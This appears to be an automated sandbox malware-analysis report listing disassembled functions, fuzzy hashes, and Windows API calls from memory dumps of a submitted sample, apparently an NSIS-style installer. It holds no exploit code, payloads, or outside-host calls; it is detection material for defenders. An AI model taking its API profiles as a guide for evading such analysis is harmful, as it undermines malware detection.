API ID:
String ID:
API String ID:
Opcode ID: 1324b8b14d6373331d46d3da48fedec1de98d0d5e738690190f5a8c662883661
Instruction ID: 9fbd65e9562c85dc1b4077d53c66b04b8f6f38a3c5463c9e8cd9bd3b8e2093f0
Opcode Fuzzy Hash: 1324b8b14d6373331d46d3da48fedec1de98d0d5e738690190f5a8c662883661
Instruction Fuzzy Hash: 0AC1BF74E00218CFDB54DFA9C994B9DBBB2BF89301F2080A9D819BB355DB359A85CF50

Function 35AF1858 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1382fc4aa829906b2b315e10460958bfc2efac2ec6a2e533b49e2ca671af3b81
Instruction ID: 6d07c5f8a17b6257bb0fc322956662e94a19909d07db18b3fdaaad581d03fc7b
Opcode Fuzzy Hash: 1382fc4aa829906b2b315e10460958bfc2efac2ec6a2e533b49e2ca671af3b81
Instruction Fuzzy Hash: 22C1B074E00258CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A86CF50

Function 35AF43C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae4ae11d1d7bd40e0ab56fee5cdb611f52ad8c5305f4e0b096be3f487bdf04b0
Instruction ID: 9b8cec94b3e2b5b1c0faf809b30ac7bfcd66f8fd1b2f09521d7b878b40ee05a4
Opcode Fuzzy Hash: ae4ae11d1d7bd40e0ab56fee5cdb611f52ad8c5305f4e0b096be3f487bdf04b0
Instruction Fuzzy Hash: 6CC1AF74E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10

Function 35AF3B18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e27827a64e7d5e132812fc5b16998488766fb75d475b757945af16e561bd84
Instruction ID: f39297e08f101d884f0f68470fea42f3a71edac5a82aa1a9ea071378951ba561
Opcode Fuzzy Hash: b0e27827a64e7d5e132812fc5b16998488766fb75d475b757945af16e561bd84
Instruction Fuzzy Hash: 51C19074E01218CFDB54DFA9C954B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF6368 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6d7129f5c1b8d76ffa7e4bd8c51a556b778dcc837e514e6a08c6ceaf07184c
Instruction ID: 047dee9ec744478fe8bdab1cab09a4003a8471f3ca37d044328351b42f45c3a4
Opcode Fuzzy Hash: 4d6d7129f5c1b8d76ffa7e4bd8c51a556b778dcc837e514e6a08c6ceaf07184c
Instruction Fuzzy Hash: F1C1BE74E00218CFEB54DFA5C994B9DBBB2AF89300F2080A9D819BB355DB359A81CF50

Function 35AF5AB8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8130f5400fdca0807c3ddc0abb6a37963e5bf89a9eea5ede68c9ff3e974cdd19
Instruction ID: 74952cbaeacbf58fce30aabe2b2ecdb349df43a4211f583135aeda24cfde2e0d
Opcode Fuzzy Hash: 8130f5400fdca0807c3ddc0abb6a37963e5bf89a9eea5ede68c9ff3e974cdd19
Instruction Fuzzy Hash: EEC1AF74E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF5208 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e8697767c2ec4a2976c24e11ca803d0daceefc6a152896b35235d9224d5361
Instruction ID: b1e69e679dd4247d0af1cd033bc5ef814746f8ab0cd4cffa5ca9a756394ece9a
Opcode Fuzzy Hash: 12e8697767c2ec4a2976c24e11ca803d0daceefc6a152896b35235d9224d5361
Instruction Fuzzy Hash: D9C1A074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10

Function 35AF3268 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7bde72e4700ad8f76f1b2718d87db4eb191e4ef75e727b914e7d409ccbabcd
Instruction ID: 6ca0385a83af6b44c6cadd7e8a46eaa3ad1c4ee33f21c9bb93981ba974c113db
Opcode Fuzzy Hash: fd7bde72e4700ad8f76f1b2718d87db4eb191e4ef75e727b914e7d409ccbabcd
Instruction Fuzzy Hash: DDC1A074E01218CFDB54DFA9C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10

Function 3387C1F2 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2436ec4a65db9914db5d65837bc92868e670a2d8baf5ce379c121fe63ff0c2b1
Instruction ID: 6ec76d98f6032b087fbb63c95bb8acd58631472e1b1af5b449685c35fcdd8585
Opcode Fuzzy Hash: 2436ec4a65db9914db5d65837bc92868e670a2d8baf5ce379c121fe63ff0c2b1
Instruction Fuzzy Hash: 70C1AF74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D419BB355DB359A86CF10

Function 3387B944 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b37c69288309635a610f53eeb677dc5e6fe1eb0e6e6165f6a1e360c3a7dcc07
Instruction ID: d294304d3bf0e745904657ca53f19a5ebc2f4d318ca3bd60ddb1b434945606bf
Opcode Fuzzy Hash: 5b37c69288309635a610f53eeb677dc5e6fe1eb0e6e6165f6a1e360c3a7dcc07
Instruction Fuzzy Hash: D8C19174E01218CFDB54DFA9C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 3387B4EC Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639b503504aaeea4f8b439f7b151507d7cbd59f06028c47dff44c08552733439
Instruction ID: 410a76bfe6dab708ef920144c5f0e6c62c8cfc62ab8b58f46f19af422e011c5c
Opcode Fuzzy Hash: 639b503504aaeea4f8b439f7b151507d7cbd59f06028c47dff44c08552733439
Instruction Fuzzy Hash: 60C19074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB355DB359E86CF10

Function 3387E790 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37964ed7bf75fc3eabd3a5f6286a9f551aa43e2125ab041e1fd9b7053afa5e48
Instruction ID: 7c34b231bdc4e4c6ce2a4355d701c705578bb070047f829453c0855ab179457e
Opcode Fuzzy Hash: 37964ed7bf75fc3eabd3a5f6286a9f551aa43e2125ab041e1fd9b7053afa5e48
Instruction Fuzzy Hash: F0B19F74E01218CFDB54DFA4C994B9DBBB2AF89300F6090A9D419BB365DB359E81CF50

Function 3387EBF2 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 096c3ee9013f12058440f0b87382db9f1c1bf5c579e0b77337d779e40a5c7691
Instruction ID: 0f7f508accf9b40c8e3a2034cc7f8bf6c2c9904feb8dc1dcc97ea31e28faa6a1
Opcode Fuzzy Hash: 096c3ee9013f12058440f0b87382db9f1c1bf5c579e0b77337d779e40a5c7691
Instruction Fuzzy Hash: 33B18078E01218CFDB54DFA4C994B9DBBB2AF89300F6081A9D419BB355DB359E85CF10

Function 3627F5D8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b9e98ff625fa339e5d238ade1441a24c7fb6acdae524a411b765390a0251ab
Instruction ID: 78fcb8a3a4007fc3819b474978c7275c20d423e56f197f2ed2ed2da50e31f082
Opcode Fuzzy Hash: 15b9e98ff625fa339e5d238ade1441a24c7fb6acdae524a411b765390a0251ab
Instruction Fuzzy Hash: 80D06775D142288ACB11DF98E8406ECB7B1EF9A311F0164A6C568A7600D6719A908E55

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

{, xrefs: 004057F5
(7B, xrefs: 0040587D

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76233420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

.DEFAULT\Control Panel\International, xrefs: 00403B44
RichEdit, xrefs: 00403D33
RichEd32, xrefs: 00403D14
.exe, xrefs: 00403BE6
RichEd20, xrefs: 00403D06
_Nb, xrefs: 00403C5C, 00403CC4
RichEdit20W, xrefs: 00403D24, 00403D2A
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
(7B, xrefs: 00403B04

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

A, xrefs: 00404973
(7B, xrefs: 0040494D

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
